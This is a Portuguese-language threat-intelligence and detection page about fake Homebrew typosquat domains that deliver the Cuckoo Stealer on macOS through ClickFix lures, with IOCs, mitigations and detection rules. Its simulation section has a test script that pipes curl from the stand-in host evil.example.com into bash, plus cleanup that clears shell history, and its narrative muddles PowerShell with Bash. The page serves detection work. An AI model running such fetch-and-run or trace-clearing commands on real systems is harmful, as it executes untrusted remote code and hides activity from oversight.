Typosquat de Fake Homebrew Usado para Entregar Cuckoo Stealer via ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório descreve uma campanha que abusa de domínios do Homebrew com erros de digitação para atrair desenvolvedores macOS a executarem comandos de “instalação” maliciosos via a técnica ClickFix. Um comando curl de linha única redireciona as vítimas para uma infraestrutura controlada pelo atacante, entregando um loader de coleta de credenciais seguido pelo infostealer Cuckoo Stealer. O malware persiste através de um LaunchAgent, remove atributos de quarentena e exfiltra credenciais e dados de carteiras via HTTPS. A detecção deve focar em padrões de comandos curl e na infraestrutura associada.
Investigação
Pesquisadores rastrearam a isca inicial para homabrews.org, resolvendo para 5.255.123.244 na Holanda e hospedando múltiplos domínios similares (incluindo raw.homabrews.org usado para entrega). O script baixado executa um loop dscl authonly para validar credenciais macOS, então recupera um binário nomeado brew_agent. Na segunda etapa, o Cuckoo Stealer cria um plist LaunchAgent, remove bandeiras de quarentena e se comunica com C2 usando a troca de chaves X25519 com payloads criptografados por XOR. A caça à infraestrutura revelou uma rede de pelo menos seis domínios compartilhando o mesmo IP de hospedagem.
Mitigação
Educar os desenvolvedores para verificar URLs de instalação do Homebrew e evitar copiar e colar comandos não confiáveis no Terminal. Habilitar o registro em linha de comando e restringir padrões onde curl busca scripts remotos para execução imediata, especialmente linhas únicas no estilo “curl | sh”. A proteção de endpoint deve alertar sobre a criação suspeita de LaunchAgent e remoção de atributos de quarentena. Defesas de rede devem bloquear domínios maliciosos conhecidos e sinalizar tráfego para raw.homabrews.org e hosts relacionados.
Resposta
Quando um comando curl suspeito é detectado, isolar o endpoint, capturar o script e o binário brew_agent, e coletar o plist LaunchAgent para análise. Redefinir credenciais colhidas e revogar tokens comprometidos, especialmente para navegadores, Chaveiro, e carteiras de criptomoedas. Revisar forensicamente o diretório oculto BrewUpdater, quaisquer atalhos criados, e remover os arquivos maliciosos. Atualizar detecções com os IOCs extraídos e monitorar o reuso da mesma infraestrutura.
Fluxo de Ataque
Detecções
Atividade Suspeita no Chaveiro (via process_creation)
Ver
Modificação de Permissões de Arquivos na Pasta Temporária Suspeita do MacOS (via cmdline)
Ver
Locais e Nomes Suspeitos de Plist no MacOS (via file_event)
Ver
Acesso Suspeito de Credenciais Armazenadas no Navegador MacOS (via process_creation)
Ver
Volume do Sistema MacOS foi Silenciado Usando Osascript (via cmdline)
Ver
Possível Coleta por Tentativa de Execução de Captura de Tela no MacOS (via cmdline)
Ver
Tentativa de Execução Curl Suspeita [MacOS] (via cmdline)
Ver
IOCs (HashSha256) para detectar: Typosquats Falsos do Homebrew Usados para Entregar Cuckoo Stealer via ClickFix
Ver
IOCs (SourceIP) para detectar: Typosquats Falsos do Homebrew Usados para Entregar Cuckoo Stealer via ClickFix
Ver
IOCs (DestinationIP) para detectar: Typosquats Falsos do Homebrew Usados para Entregar Cuckoo Stealer via ClickFix
Ver
Detecção de Comando de Instalação Malicioso no macOS via ClickFix [Criação de Processo no Linux]
Ver
Detecção de Domínio de Typosquatting e IP Malicioso na Campanha ClickFix [Indicadores de Rede]
Ver
Execução de Simulação
Pré-requisito: A Verificação Pré-Vôo de Telemetria & Baseline deve ter passado.
Fundamento: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa do Ataque & Comandos:
Um atacante obteve um script malicioso codificado em PowerShell hospedado em um servidor C2. Para evitar escrever arquivos no disco, o atacante transmite o script diretamente em um shell Bash usandocurl -fsSLe a-cflag. O comando é executado interativamente a partir de uma conta de usuário comprometida, imitando um instalador “click-fix” legítimo. Os passos são:- Resolver o URL do payload malicioso (por exemplo,
https://evil.example.com/payload.sh). - Canalizar o download para o Bash, instruindo-o a executar o conteúdo com
-c. - O payload realiza a coleta de credenciais, cria um arquivo oculto e então apaga o script temporário (cobrindo T1070.004).
- Resolver o URL do payload malicioso (por exemplo,
-
Script de Teste de Regressão:
#!/usr/bin/env bash # ------------------------------------------------- # Simular instalador malicioso macOS (estilo ClickFix) # ------------------------------------------------- set -euo pipefail MALICIOUS_URL="https://evil.example.com/payload.sh" # Transmitir o payload diretamente para o Bash com -c curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)" # Assume-se que o próprio payload executa suas ações maliciosas. # Para o propósito do teste, simplesmente ecoamos um marcador. echo "Payload malicioso executado" -
Comandos de Limpeza:
# Remover quaisquer arquivos que possam ter sido criados pelo payload rm -f /tmp/payload.sh # Opcionalmente, limpar o histórico de comandos para reduzir traços forenses history -c